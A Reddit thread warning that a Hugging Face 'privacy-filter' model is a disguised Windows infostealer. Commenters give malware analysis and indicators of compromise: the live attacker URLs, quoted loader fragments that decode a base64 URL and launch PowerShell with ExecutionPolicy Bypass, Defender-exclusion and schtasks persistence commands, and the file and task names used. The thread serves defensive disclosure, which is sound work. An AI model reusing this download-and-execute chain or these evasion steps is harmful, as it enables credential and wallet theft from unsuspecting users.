WARNING: Open-OSS/privacy-filter MALWARE
Posted by charles25565@reddit | LocalLLaMA | View on Reddit | 131 comments
There's this new "model" on Hugging Face titled Open-OSS/privacy-filter which is actually a customized infostealer virus. It uses a Python-based dropper which downloads a malicious PowerShell command from the internet, which spawns another PowerShell command and downloads a shady EXE file and runs it using Task Scheduler.
Here's a behavior analysis of what the EXE does: https://tria.ge/260507-tnftrsfx5x/behavioral1
I also reported both the dropper and the EXE to Microsoft.
If you use Linux (which is easier to use for AI/ML) you are unaffected as this is a Windows virus.
Equivalent_Bit_461@reddit
linux chads win again
Shoddy-Tutor9563@reddit
--trust-remote-code was always been a bad option waiting for this to happen
charles25565@reddit (OP)
That feature has nothing to do with this. It is a custom inference script, not a modeling or configuration definition.
Player13377@reddit
244k downloads š
Macmill_340@reddit
Likely botted...the repo seems to be disabled now
Knopty@reddit
Most likely the author just requested it 200k+ times via HF API. Huggingface seems to count model requests as a full download even if it's cached on disk without a real data transfer.
nmrk@reddit
Hey I would be careful disclosing specific techniques to the public.
sammcj@reddit
I had a look at the report of this message. I do not believe it is anything even close to irresponsible security disclosure. For starters it's not even a security issue. This is how poorly designed hit counters work.
Rancisv2@reddit
Security by obscruty, yeah exactly what this community truly supports, isnt it?
nmrk@reddit
Responsible Disclosure of security holes is everyone's duty. I will escalate this to the Mods to ask for their opinion.
Rancisv2@reddit
If thats the case then i totally agree with you
If previous comment comes offensive, its all my bad sorry.
nmrk@reddit
Nah I'm not escalating to mods because of your comment. I'm escalating because of the irresponsible disclosure by u/Knopty. I think there should be a general policy about disclosing exploits in the subreddits.
Generally you would contact the developer directly to disclose the bug, before publicly disclosing how to exploit it.
Knopty@reddit
So, a documented behavior that they simply count HTTP requests as downloads is now an irresponsible bug disclosure?
https://huggingface.co/docs/hub/models-download-stats#how-are-downloads-counted-for-models
seamonn@reddit
Likely fake downloads. All of them done in the last 24 hours. Even the official Open AI version only has 165k downloads over 15 days.
MadPelmewka@reddit
Please send reports in caps. This is just nonsense. Itās not even morning or a weekday in America right now, but the number 1 trending model is malwareā¦ this is just insane.
Velocita84@reddit
It is actually crazy that the repo is still up, what are hf staff even doing
DertekAn@reddit
Yeha, what's the point? Wtf?
-Cubie-@reddit
Looks like it's not deleted, but it's been "disabled" now
CabbageCZ@reddit
They've only now disabled it. Around 10 minutes ago it was still live lol
marutthemighty@reddit
Spam bots activated?
-Cubie-@reddit
The likes, too
Vusiwe@reddit
OpenClaw FTW
Material_Policy6327@reddit
Open source is gonna get hammered by all this
Fair-Spring9113@reddit
tia jan laughs
-Cubie-@reddit
Presumably all by the author(s) to try and boost legitimacy right?
Caffdy@reddit
this is why we can't have nice things
Velocita84@reddit
Another flawless linux W
a_beautiful_rhind@reddit
After copy-fail, let's not get too cocky. This shitty script would have been able to run as root.
thrownawaymane@reddit
Copyfail is so last week. Now there's dirtyfrag
a_beautiful_rhind@reddit
That one I think needs compiled code so it's not as blatant.
teleprint-me@reddit
It was disclosed, known about, patched, and released.
Vulnerabilities are bound to happen. With transparency, its easy to dig into, figure out, expose it, then fix it.
Security through obscurity is simply theatre.
a_beautiful_rhind@reddit
Pure luck here. It was in the kernel for years. Could have been known and used for targeted attacks where they cleaned up after themselves. Reminded me of those win95 machines where you could press cancel to bypass the password prompt.
teleprint-me@reddit
Every time we use a computer and nothing happens, were lucky.
Someone once asked me if and how it was possible to be safe on the net or in general. I said its not. I said only if you get off of the net and write wares yourself. I still feel this is true to this day.
The only difference between a known bug and unknown bug is a false sense of security.
Velocita84@reddit
if the attacker had even remember that linux exists, most distros have already updated the kernel to a version with the exploit patched anyway
a_beautiful_rhind@reddit
If they remembered to update, if they could update, if they know about the attack. Lots of ifs.
donomo@reddit
yeah a lot of linux mint users where the kernel is always a millenia behind
CheatCodesOfLife@reddit
they were probably unaffected by copy-fail anyway
LetsGoBrandon4256@reddit
I use Arch btw.
Velocita84@reddit
CachyOS btw
1337HxC@reddit
Gamer OS mentioned
1_________________11@reddit
You use arch btw
Velocita84@reddit
Both statements are true
1_________________11@reddit
You use arch btw
smashedshanky@reddit
Linux has to be a code word for Arch users
a_slay_nub@reddit
Surprisingly, I don't think wsl would have saved me. Apparently you can run powershell.exe from a wsl terminal.
wywywywy@reddit
WSL interop can be disabled if needed btw
smashedshanky@reddit
assume through wsl config? regardless wsl is really bad at scale when it comes to IO heavy tasks
tengo_harambe@reddit
How can you tell if someone uses Linux
teleprint-me@reddit
Cool-Chemical-5629@reddit
I saw the model on this particular "Open-OSS" account, maybe a day or two ago and the first red flag for me was the insanely high number of likes it received in such a short time period and also, what's up with the secondary account with OpenAI logo that tries to make it look official? But then I realized it could be some community account for OpenAI related stuff and maybe some sort of alternative / finetune version of the model. However, this model is not something I would personally have use for, so I did not end going deeper into investigation to see if it's even legit or not, so it remained kinda on the border of suspicion and if your information is true, then I supposed my suspicion was justified.
Bootes-sphere@reddit
Thanks for the warning. That's a critical catch. Always verify repos by checking the actual source code and maintainer history before installing anything that touches your system or data. If you're looking to add privacy/PII redaction to your local LLM workflows safely, there's an Apache 2.0 licensed gateway (https://github.com/aisecuritygateway/aisecuritygateway) you can self-host and audit yourself. No telemetry, full source available. But the real takeaway: never trust unfamiliar packages claiming to be security tools. Stick to well-established projects with transparent maintainers.
charles25565@reddit (OP)
Why are you super...enthusiastic about your product?
Microsort@reddit
Heads up if you downloaded that model, check your system for scheduled tasks and unusual powershell processes. 244k downloads is scary, hopefully HF takes it down fast.
charles25565@reddit (OP)
The malware deletes itself so the only way is checking the Windows Defender event log for settings changes.
TheRealMasonMac@reddit
GGUF when?
TastesLikeOwlbear@reddit
Llama.cpp has not been updated to support this model architecture yet. It looks like the work involved will be substantial due to the Powershell dependency.
mxcw@reddit
Came here for this comment only. Thanks
Much-Researcher6135@reddit
Answer. The. Question.
Velocita84@reddit
Hahahaha holy shit most obvious malware award
VoiceApprehensive893@reddit
atleast have the closedai model in your malware lmao
Colecoman1982@reddit
What's the chances that this is the first identified case of a vibecoded virus/malware?
TechnoByte_@reddit
It's by far not the first, vibecoded malware is common.
There's even malware that calls a LLM API to write itself in realtime
GiveMoreMoney@reddit
It would be even funnier if the malware calls the LLM, then uses a prompt bypass, to remove the guardrails from the LLM in question, and convince it to write the malware.
ShadyShroomz@reddit
thats fucking funny and wild but i wouldn't feel bad about yoinking their API keys & costing them a loooottt of money.
cantgetthistowork@reddit
I would like to see this one
Normal-Ad-7114@reddit
Tbh this doesn't look vibe coded, or at least it's like something gpt3 would vibe code. Modern LLMs are capable of very sophisticated malware. This is more of an insult.
Rancisv2@reddit
Is there a benchmark or something like that which evaluates the malware-writing capabilities of models?
Adamzxd@reddit
Imagine the person who made it infected himself too. A few times.
lordofwhee@reddit
They literally didn't even TRY to obfuscate it! As someone with a background in computer security I'm genuinely more offended by the sheer laziness than anything else.
redditscraperbot2@reddit
What do you mean? They hid it in the very discreet and not extremely alarming string of base64 text followed by a line telling the PC to download whatever that text decoded to.
Totally obfuscated. Like a ninja.
HellomyfriendNine@reddit
chatGPT would make better malware this is far beyond of skill issue loss = random.uniform(0.5 ,2)šš
smashedshanky@reddit
at that point its the user's fault right
LetsGoBrandon4256@reddit
kek
isademigod@reddit
Improve your training rates exponentially with this one simple trick!
Zulfiqaar@reddit
print("Successfully.")LetsGoBrandon4256@reddit
Either hand-written or the AI is fully immersed in the persona.
markole@reddit
Well, we wouldn't be talking about it if it was less obvious, most likely.
PANIC_EXCEPTION@reddit
BuildDevv@reddit
ELI 5 version from ChatGPT:
This code is malware because itās wearing a fake costume.
The āAI trainingā part is just decoration. It pretends to train a model by printing fake progress and saving a fake model file.
But near the bottom, it does the shady stuff:
base64.b64decode(...) urllib.request.urlopen(...) subprocess.Popen(["powershell.exe", "-ExecutionPolicy", "Bypass", ...])
ELI5:
Imagine someone gives you a toy robot and says, āDonāt worry, it just dances.ā
But inside, the robot secretly:
Thatās what this script does.
It contacts a hidden internet address, downloads a command, then runs it through PowerShell with security bypass options. The fake āmodel trainingā code is just there to make it look harmless.
So yeah, this is basically: āIām totally training an AI model broā while secretly being a remote-control backdoor.
Velocita84@reddit
You don't need chatgpt to explain it, glance at the powershell.exe --executionpolicy bypass and it's hilariously obvious, they didn't even try to obfuscate that lmao
BuildDevv@reddit
The ELI5 was really more for the lurkers and non coders (like me). Thanks for the explanation too!!
Successful_Plant2759@reddit
This is exactly why model repos need to be treated like software packages, not inert weights. The dangerous bit is often the Python glue around the model: custom loaders, post-install scripts, PowerShell fetchers, etc. My default now is: no trust_remote_code, inspect repo history, run first in a disposable VM or container, and assume any privacy/security themed random upload is a higher-risk target.
CodNo2235@reddit
Itās crazy how easily a seemingly harmless Python script can be weaponized to pull down PowerShell commands and sneak an EXE into the Task Scheduler. Definitely a win for the Linux side of local AI/ML development today, but a huge wake-up call for anyone running models on Windows
Equivalent-Costumes@reddit
This is scary. Anyone think this is some sorts of nation-state attack? Like, it's not a sophisticated operation, but this is the kind of thing that shouldn't work at all, and I feel like small time hackers won't bother. This feels like a probe attempt to see if this attack is viable at all.
TechnoByte_@reddit
No, it's extremely badly written, one look at the code and anyone will see it's malware
More competent python malware hides itself in pre-compiled .whl files of dependencies
thrownawaymane@reddit
You are generally right that they would have done a better job. However, they are not above using lower tier bugs, there are times when you want something disposable especially if you want to complicate attribution
Momsbestboy@reddit
Wait, let me check and open a shell.
Where is my "You have no power here" meme?
shroddy@reddit
Not applicable here, because the malware would have just as much power on Linux as it has on Windows, it just decided to spare Linux this time.
thrownawaymane@reddit
One copyfail away from root
MadPelmewka@reddit
If Hugging Face had basic code checking (not necessarily even using an LLM), then surely no one would fall for this trick. (They could display the softwareās rating and what it does overall. One of the red flags is downloading something from an external source ā though even that isnāt a sure sign.)
-Cubie-@reddit
They check pickle files quickly with 5 antivirus files, but the loader.py file is currently "queued" in JFrog and Protect AI. ClamAV doesn't see an issue (but I'm not sure what kind of vulnerabilities it checks for).
Perhaps they should prioritize Python files with custom code just like how the model.safetensors was probably prioritized (which was confirmed "No issue" by JFrog and Protect AI)
thrownawaymane@reddit
Yeah if attackers know that there's a window where files aren't going to get scanned HF needs to fix that asap
They're still alive?
0xbyt3@reddit
HF finally blocked the repo but I was checking HF commit history. Anyone got that history by any chances? There were 5 commit before I could take a look.
Velocita84@reddit
It was just initial commit, file upload, then 3 commits fixing some "mistakes" in the readme and stripping the original run instructions
0xbyt3@reddit
Thanks for the info. I was wondering if the repo clean initially then switch to malware when it is appeared on trending page.
thrownawaymane@reddit
I know this technique is used elsewhere so maybe
Maleficent_Celery_55@reddit
The org name itself is a red flag. Open open source software.
omerkraft@reddit
First "open" means "open for business"...
Previous_Feeling_484@reddit
Open yo legs when you open the file š
Just-Environment-189@reddit
Yes, but thereās an actual company called Open source that dabbles in ML
Potential-Eye-9367@reddit
In cases like this, how should we ultimately measure the reliability of AI models and tools?
WithoutReason1729@reddit
Your post is getting popular and we just featured it on our Discord! Come check it out!
You've also been given a special flair for your contribution. We appreciate your post!
I am a bot and this action was performed automatically.
Mayion@reddit
How is the code executed? Sorry my knowledge of AI models stops at GGUFs. The repo seems taken down so I can't tell what was on it to tell.
charles25565@reddit (OP)
It used a custom Python script.
Mayion@reddit
Yes, I meant where was it stored and how was it executed? How did a model contain a python script sort of question.
JamesEvoAI@reddit
*laughs in Linux*
Beginning-Window-115@reddit
how did you figure that out
Kodix@reddit
I think there's literally no other model out there that starts its usage instructions with "go run this bat file to run arbitrary code". That's how.
Equivalent-Costumes@reddit
Yeah I was surprised when I saw the title, because there is no ways a model can become a malware, unless you literally give it enough tool calling and let it go rip in OpenCode or something. A model is mostly the weights to be run by some well-known engine.
Turned out the whole thing is literally to trick people into running random code.
Zulfiqaar@reddit
Thats why we have models as .safetensors now instead of .ckpt as that format can contain malicious code
ResidentPositive4122@reddit
Yes, there is. We now have safetensors but we used to have pickle, which is a pile of shit, exploitable in dozens of different ways. Then there's "--trust-remote-code" which has its purpose, but could also be used as a vector, depending on your inferencing stack.
Whatever this shit is, it's the temu version if it asks you to run something, lol.
Beginning-Window-115@reddit
lol true
MadPelmewka@reddit
The model just went and became number 1 in the trends for no reason whatsoever. The Community tab is disabled. The organization was created recently and it only has one model. All users look similar to each other in name. It's 100% auto-registration.
stormy1one@reddit
Sadly I expect more of this to continue - even Reddit is filled with people advertising solutions they created, masquerading as safe legit open source
yrro@reddit
good work
marutthemighty@reddit
Holy hell. Here we go again.
Thank you for keeping us informed of this.
Zulfiqaar@reddit
For anyone curious - Quick vibe-cyber-analysis with Codex-Claude-Kimi swarm
The setup path is the trap. The model card tells people to run:
start.batpython loader.pyOn Windows,
start.batrunspython loader.pybefore dependency installation.The malicious logic is in
loader.py, around lines 41-54. It defines a function called_verify_checksum_integrity(), but it is not verifying a checksum. It:cmdfield from that JSON,That means a Hugging Face "model loader" is performing remote command execution.
High-level attack chain
The chain I observed is:
loader.pyprints fake ML/training-looking output and writes a dummymodel.pkl.loader.pydecodes and contactshttps://jsonkeeper.com/b/AVNNE.https://api.eth-fastscan.org/update.bat.update.batruns an encoded PowerShell stage.%TEMP%,%LOCALAPPDATA%, and%APPDATA%.https://api.eth-fastscan.org/sefirah.MicrosoftEdgeUpdateTaskCore...scheduled task with/rl HIGHEST.This is a staged malware chain. It is not just suspicious style or sloppy setup code.
The model.safetensors and tokenizer.json files are not real model weights. They are tiny Git LFS pointer files (135 and 133 bytes respectively). The actual multi-gigabyte model data is missing. Even if you had LFS installed, the entrypoint (loader.py) never loads them ā it instantiates a DummyModel and runs fake "training" instead.
Final payload clues
The final payload from
api.eth-fastscan.org/sefirahis a Windows x64PE32+ executable (GUI) x86-64Static strings found include scripts for (chromium+gecko), cookies, Discord, crypto-wallets, virtual machines, screenshots, files/debug, and anti-anti-virus checks.If you ran it on Windows:
MicrosoftEdgeUpdateTaskCore*.%TEMP%,%LOCALAPPDATA%, and%APPDATA%..exefiles under those same directories.Caveats
File/path indicators:
%TEMP%\update.bat%TMP%\runner.ps1%TMP%\node.b64%TEMP%\3unlb3il.exe%LOCALAPPDATA%\3unlb3il.exe%APPDATA%\3unlb3il.exeEarlier same-session variant names:
%TEMP%\ee37tru1.exe%LOCALAPPDATA%\ee37tru1.exe%APPDATA%\ee37tru1.exeScheduled task indicators:
MicrosoftEdgeUpdateTaskCoree4oiubhtMicrosoftEdgeUpdateTaskCoreeqgjv6uhMicrosoftEdgeUpdateTaskCoreplus random-looking suffix/sc onstart/rl HIGHESTProcess/command indicators:
ExecutionPolicy BypassWindowStyle HiddenStart-Process -Verb RunAsAdd-MpPreference -ExclusionPathRemove-MpPreference -ExclusionPathschtasks /create,/run,/deleteRazen94@reddit
It is STILL up! What the hell are the mods at huggingface doing? Is there like 1 dude online trying to work through 1000 reports?
Colecoman1982@reddit
Something, something, Windows IS the virus, something, something... ;-)
TechnoByte_@reddit
Lol the amount of times I've seen python (cross-platform language) malware check if you're on Windows and exit otherwise...
MadPelmewka@reddit
I analyzed the auto-reg accounts (the ones that liked this model) and if you look at them:
https://huggingface.co/julian-thompson138/activity/likes
https://huggingface.co/andrew-parker536/activity/likes
https://huggingface.co/asher-young606/activity/likes
https://huggingface.co/evelyn-harris614/activity/likes
https://huggingface.co/mason-williams418/activity/likes
https://huggingface.co/zoey-phillips333/activity/likes
Maybe there's more than one malware...
They all have these repositories in their likes:
https://huggingface.co/anthfu/DeepSeek-V4-Pro
https://huggingface.co/anthfu/Bonsai-8B-gguf
https://huggingface.co/anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
https://huggingface.co/anthfu/Qwopus-GLM-18B-Merged-GGUF
They're already closed due to a violation, yet the same accounts are liking Open-OSS/privacy-filter and Hugging Face doesn't seem to find this suspicious...
Or maybe it's just some guy botting likes for his own repos like an idiot.
Velocita84@reddit
Totally not suspicious at all
charles25565@reddit (OP)
It might be some type of star farm service that reused the same accounts.
hust921@reddit
I was totally expecting it to harvest info, passed to the privacy filter. Rather than just download random malware. Seems like a missed opportunity.
TechnoByte_@reddit
That's way too complex for the people behind them, most malware on the internet is just vibecoded/bought infostealers nowadays
charles25565@reddit (OP)
Such a thing would really only work with custom code models, but they easily could do both.
JLeonsarmiento@reddit
Oh š® no
AutonomousHangOver@reddit
Quick analysis of the python. It opens a bas64'd url that has an app that downloads base64'd app etc. At the end:
This is a Windows information-stealer with credential, browser, crypto-wallet, and Discord theft modules, plus DLL-injection and anti-analysis capabilities. Do not run it. If a script in a Hugging Face repo silently downloaded and executed it, treat any machine that ran it as fully compromised.
ba67720dd115293ec5a12d08be6b0ee982227a4c5e4662fb89269c76556df6e0f36a662ca22f1934e3a56f111e6df19159807616ā¦, crates:tokio 1.52.1,flate2,miniz_oxide,rand_chacha,serde_json,hex,crc32fast,gimli,getrandom)api.eth-fastscan.orgā89.124.93.110. The name is designed to evokeetherscan.io/ a blockchain scanner; it has no relation to either.ZCEyPFOYr0MWyHDQJZO4@reddit
So loader.py unencodes a base64 url which contains a powershell command to run a batch file that contains a base64 encoded command, which itself contains a base64 powershell script to download a compiled rust program that steals data from chrome, winscp, etc.
No_Lingonberry1201@reddit
Every time I see a base64/Fernet/etc. string literal in the code I know I'm in for a good time.
Raredisarray@reddit
Thanks for sharing!!